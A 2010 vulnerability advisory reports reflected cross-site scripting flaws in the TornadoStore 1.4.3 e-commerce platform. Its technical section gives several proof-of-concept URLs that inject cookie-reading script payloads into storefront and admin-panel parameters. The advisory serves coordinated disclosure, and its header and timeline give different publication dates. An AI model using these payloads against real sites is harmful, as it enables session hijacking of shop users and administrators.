TornadoStore 1.4.3 Cross Site Scripting

` Bonsai Information Security - Advisory  
http://www.bonsai-sec.com/research/  
  
Multiple XSS in TornadoStore 1.4.3  
  
1. *Advisory Information*  
  
Title: Multiple XSS in TornadoStore 1.4.3  
Advisory ID: BONSAI-2010-0107  
Advisory URL:  
http://www.bonsai-sec.com/research/vulnerabilities/tornadostore-multiple-xss-0107.php  
Date published: 2010-06-29  
Vendors contacted: TornadoStore  
Release mode: Coordinated release  
  
  
2. *Vulnerability Information*  
  
Class: Multiple Cross Site Scripting (XSS)  
Remotely Exploitable: Yes  
Locally Exploitable: Yes  
CVE Name: CVE-2010-1328   
  
  
3. *Software Description*  
  
TornadoStore™ is an ecommerce platform. The objective is to solve integrally  
the commercialization of products and services of companies using an online   
payment system. [0].  
  
  
4. *Vulnerability Description*  
  
Cross-Site Scripting attacks are a type of injection problem, in which   
malicious scripts are injected into the otherwise benign and trusted web sites.  
Cross-site scripting (XSS) attacks occur when an attacker uses a web   
application to send malicious code, generally in the form of a browser side   
script, to a different end user. Flaws that allow these attacks to succeed are  
quite widespread and occur anywhere a web application uses input from a user  
in the output it generates without validating or encoding it.   
  
For additional information, please read [1].  
  
  
5. *Vulnerable packages*  
  
Version <= 1.4.3  
  
  
6. *Non-vulnerable packages*  
  
TornadoStore developers informed us that all users should upgrade to the latest   
version of TornadoStore, which fixes this vulnerability. More information to be   
found here:  
http://www.tornadostore.com  
  
  
7. *Credits*  
  
This vulnerability was discovered by Lucas Apa ( lucas -at- bonsai-sec.com ).  
  
  
8. *Technical Description*  
  
8.1 A Reflected Cross Site Scripting vulnerability was found in the   
"tipo" and "destino" variables within the 'Services' section  
and "rubro", "arti" on 'Products' section.  
This is because the application does not properly sanitise  
the users input. The vulnerability can be triggered by clicking on the   
following URL:  
  
http://www.example.com/login_registrese.php3?tipo=bonsai"/><script>alert(document.cookie)</script>&destino=ordenes_pago.php3  
  
http://www.example.com/login_registrese.php3?destino=cliente_ctacte.php3"<script>alert(document.cookie)</script>  
  
http://www.example.com/precios.php3?pbegin=0&subrubro=15&rubro=4"</a><script>alert(document.cookie)</script>"&expand=SI&familia=&marca=&campoorden=nArtPre&vertodos=ALL  
  
http://www.example.com/recomenda_articulo.php3?arti=002"><script>alert(document.cookie)</script>  
  
8.2 A Reflected Cross Site Scripting vulnerability was found in the  
TornadoStore Administration Panel. In "descrip" and "tit" variables  
within the 'e-Commerce' Section. This could lead to admin session hijacking.  
  
http://www.example.com/control/abm_det.php3?db=ts_143&tabla=profile&id=cDefSec%3DMAIN%2CcDefKey%3DMAIL_PEDIDO_TEMPRANO%2CcSis%3Ddemo_143&tabla_det=&tit=Par%E1metros%20del%20sitio&pkmapped=&ira=&pagina=1&det_order=&det_ordor=&txtBuscar=&vars=display_text_chars=45,display_text_lines=1&where=cDefSec=%27MAIN%27&whereMaster=cDefSec=%27MAIN%27&descrip="<script>alert(document.cookie)</script><a href="  
  
http://www.example.com/control/abm_list.php3?db=ts_143&tabla=delivery_courier&tabla_det=delivery_costo&order=&ordor=&tit=</span></td><script>alert(document.cookie)</script>&transporte=&ira=&pagina=1&det_order=nDeCSer&det_ordor=asc&txtBuscar=&vars=&where=  
  
http://www.example.com/control/abm_det.php3?db=ts_143&tabla=usuario&tit=</span></td><script>alert(document.cookie)</script>  
  
  
9. *Report Timeline*  
  
- 2010-02-02:  
Vulnerabilities were identified.  
  
- 2010-02-08:  
Vendor confirmed these vulnerabilities.  
  
- 2010-02-16:  
Vendor contacted for an approximate fix release date. No specific answer given.  
  
- 2010-03-10:  
Vendor fixed these vulnerabilities. No specific answer given.  
  
- 2010-04-12:  
Vendor fixed this issue.  
  
- 2010-05-29:  
The advisory BONSAI-2010-0107 is published.  
  
  
10. *References*  
  
[0] http://www.tornadostore.com  
[1] http://www.owasp.org/index.php/Cross_site_scripting  
[2] http://www.bonsai-sec.com/blog/  
  
11. *About Bonsai*  
  
Bonsai is a company involved in providing professional computer information security services.  
Currently a sound growth company, since its foundation in early 2009 in Buenos Aires, Argentina,   
we are fully committed to quality service, and focused on our customers' real needs.  
  
  
12. *Disclaimer*  
  
The contents of this advisory are copyright (c) 2010 Bonsai Information Security, and may be   
distributed freely provided that no fee is charged for this distribution and proper credit is   
given.  
  
`